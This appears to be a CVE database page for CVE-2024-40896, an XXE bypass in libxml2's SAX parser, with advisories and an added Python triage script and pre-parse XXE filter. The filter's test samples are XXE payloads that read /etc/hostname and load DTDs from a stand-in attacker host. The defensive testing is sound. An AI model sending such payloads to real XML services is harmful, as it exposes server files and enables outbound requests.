CVE-2024-40896

Severity: 9.1 CRITICAL
EPSS: 0.6% (top 31.95%)
CISA KEV: Not in KEV
Exploit: No known exploits
Timeline: Published 2024-12-23; latest update 2025-04-15

Description

In libxml2 2.11 before 2.11.9, 2.12 before 2.12.9, and 2.13 before 2.13.3, the SAX parser can still produce events for the content of external entities even when a custom SAX handler tries to override the entity content by marking the entity "checked". An application that relied on that override to suppress external entity content is therefore still exposed to classic XXE attacks; the fix is to upgrade to 2.11.9, 2.12.9 or 2.13.3 (or a distribution build that backports the patch).
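
Two checks a practitioner would want next to this entry, as an added example that is not code from this page, from libxml2, or from any vendor advisory: a triage helper that maps an upstream libxml2 version onto the affected ranges stated in the description, and a pre-parse gate that refuses untrusted XML declaring an external DTD or external entity. The gate is a general XXE mitigation applied before the bytes reach any parser; it does not depend on SAX-handler tricks such as the "checked" override this CVE shows to be bypassable, and it does not replace upgrading. Function names, verdict strings and the sample documents are this example's own assumptions.

```python
"""Triage and hardening helpers around CVE-2024-40896 (libxml2 SAX XXE).

Added example for this page; not code from libxml2, cvebase.io or any
vendor advisory. Names, sample documents and verdict strings are its own.
"""
import re

# Fixed release per affected branch, from the CVE description:
# 2.11 before 2.11.9, 2.12 before 2.12.9, 2.13 before 2.13.3.
FIXED_BY_BRANCH = {(2, 11): 9, (2, 12): 9, (2, 13): 3}


def parse_version(text):
    """Parse '2.12.7' or '2.12.7+dfsg-3ubuntu0.1' into (major, minor, micro)."""
    m = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("not a libxml2 version string: %r" % (text,))
    return tuple(int(p) for p in m.groups())


def is_affected_upstream(version):
    """True/False for an upstream libxml2 release; None if the branch is
    not named by the CVE text (e.g. 2.14+), so its status is unknown here.

    Only meaningful for upstream builds: distributions backport the fix
    without bumping the upstream number (Ubuntu fixes this in
    2.12.7+dfsg-3ubuntu0.1, which this function still flags as affected),
    so for distro packages trust the vendor advisory, not this check.
    """
    major, minor, micro = parse_version(version)
    fixed_micro = FIXED_BY_BRANCH.get((major, minor))
    if fixed_micro is None:
        return None
    return micro < fixed_micro


# Prolog patterns an XXE payload needs: an external DTD subset, or an
# external (SYSTEM/PUBLIC) general or parameter entity declaration.
_DOCTYPE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
_EXTERNAL_DTD = re.compile(r"<!DOCTYPE\s+[^\s>\[]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
_EXTERNAL_ENTITY = re.compile(r"<!ENTITY\s+%?\s*[^\s>]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)


def _decode_for_inspection(data):
    """Decode the document so the DOCTYPE scan cannot be dodged by encoding.

    A UTF-16 payload interleaves NUL bytes, so a naive search for
    b'<!DOCTYPE' misses it; follow the BOM / first-bytes rules of
    XML 1.0 Appendix F for the cases that matter here.
    """
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return data.decode("utf-16", errors="replace")
    if data.startswith(b"<\x00"):
        return data.decode("utf-16-le", errors="replace")
    if data.startswith(b"\x00<"):
        return data.decode("utf-16-be", errors="replace")
    return data.decode("utf-8", errors="replace")


def xxe_gate(data):
    """Classify untrusted XML bytes before they reach any parser.

    'reject'  - external DTD or external entity declared: an XXE vector
                regardless of how the SAX layer treats entity content
    'has-dtd' - DOCTYPE with only an internal subset (still worth
                rejecting if the application never needs DTDs)
    'ok'      - no DOCTYPE at all
    A '<!DOCTYPE' inside a comment is reported too; that is fail-safe.
    """
    text = _decode_for_inspection(data)
    if _EXTERNAL_DTD.search(text) or _EXTERNAL_ENTITY.search(text):
        return "reject"
    if _DOCTYPE.search(text):
        return "has-dtd"
    return "ok"


# Constructed sample documents (not taken from any real exploit or advisory).
XXE_FILE_READ = (
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE r [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>\n'
    b"<r>&xxe;</r>\n"
)
XXE_PARAMETER_ENTITY = (
    b'<!DOCTYPE r [ <!ENTITY % ext SYSTEM "http://attacker.invalid/e.dtd"> %ext; ]>'
    b"<r/>"
)
XXE_EXTERNAL_DTD = b'<!DOCTYPE r SYSTEM "http://attacker.invalid/r.dtd"><r/>'
INTERNAL_ONLY = b'<!DOCTYPE r [ <!ENTITY greeting "hello"> ]><r>&greeting;</r>'
BENIGN = b'<?xml version="1.0"?><r><item>1</item></r>'

if __name__ == "__main__":
    for ver in ("2.11.8", "2.11.9", "2.12.7+dfsg-3ubuntu0.1", "2.13.3", "2.14.0"):
        print(ver, "->", is_affected_upstream(ver))
    samples = [("file read", XXE_FILE_READ), ("param entity", XXE_PARAMETER_ENTITY),
               ("external DTD", XXE_EXTERNAL_DTD), ("internal DTD", INTERNAL_ONLY),
               ("benign", BENIGN)]
    for name, doc in samples:
        utf16 = doc.decode("utf-8").encode("utf-16")
        print(name, "->", xxe_gate(doc), "| same document as UTF-16:", xxe_gate(utf16))
```

The gate deliberately errs toward rejection: anything that looks like an external DTD or external entity is refused, and a bare DOCTYPE is surfaced so the application can decide whether it ever needs DTDs on untrusted input (most do not, and refusing all DOCTYPEs is the simplest policy). The version helper is for upstream builds only; the Ubuntu entry on this page is the reminder that a distro package can be patched while still reporting 2.12.7.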

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
Exploitability: 3.9 | Impact: 5.2

Affected Packages (3)

Source     Package            Affected range
CVEListV5  libxml2/libxml2    2.11.0 to < 2.11.9, plus 2 further ranges (2.12.x < 2.12.9, 2.13.x < 2.13.3)
NVD        xmlsoft/libxml2    2.11.0 to < 2.11.9, plus 2 further ranges (2.12.x < 2.12.9, 2.13.x < 2.13.3)
Ubuntu     libxml2            < 2.12.7+dfsg-3ubuntu0.1

🔴 Vulnerability Details (3)

Source   Identifier            Title                Date
GHSA     GHSA-6c2p-rqx3-w4px   In libxml2 2…        2024-12-23
OSV      CVE-2024-40896        In libxml2 2…        2024-12-23
CVEList  CVE-2024-40896        In libxml2 2…        2024-12-23

📋 Vendor Advisories (7)

Vendor     Date        Advisory
Oracle     2025-04-15  Oracle Communications Applications Risk Matrix: Core (libxml2) — CVE-2024-40896
Ubuntu     2025-01-16  libxml2 vulnerability
Red Hat    2024-12-23  libxml2: XXE vulnerability
Microsoft  2024-12-10  In libxml2 2.11 before 2.11.9, 2.12 before 2.12.9, and 2.13 before 2.13.3, the SAX parser can produce events for external entities even if custom SAX handlers try to override entity content (by settin…
Oracle     2024-04-15  Oracle Communications Risk Matrix: Install/Upgrade (Pygments) — CVE-2022-40896 (note: this entry concerns CVE-2022-40896 in Pygments, not this libxml2 CVE)
CVE-2024-40896 (CRITICAL CVSS 9.1) | In libxml2 2.11 before 2.11.9 | cvebase.io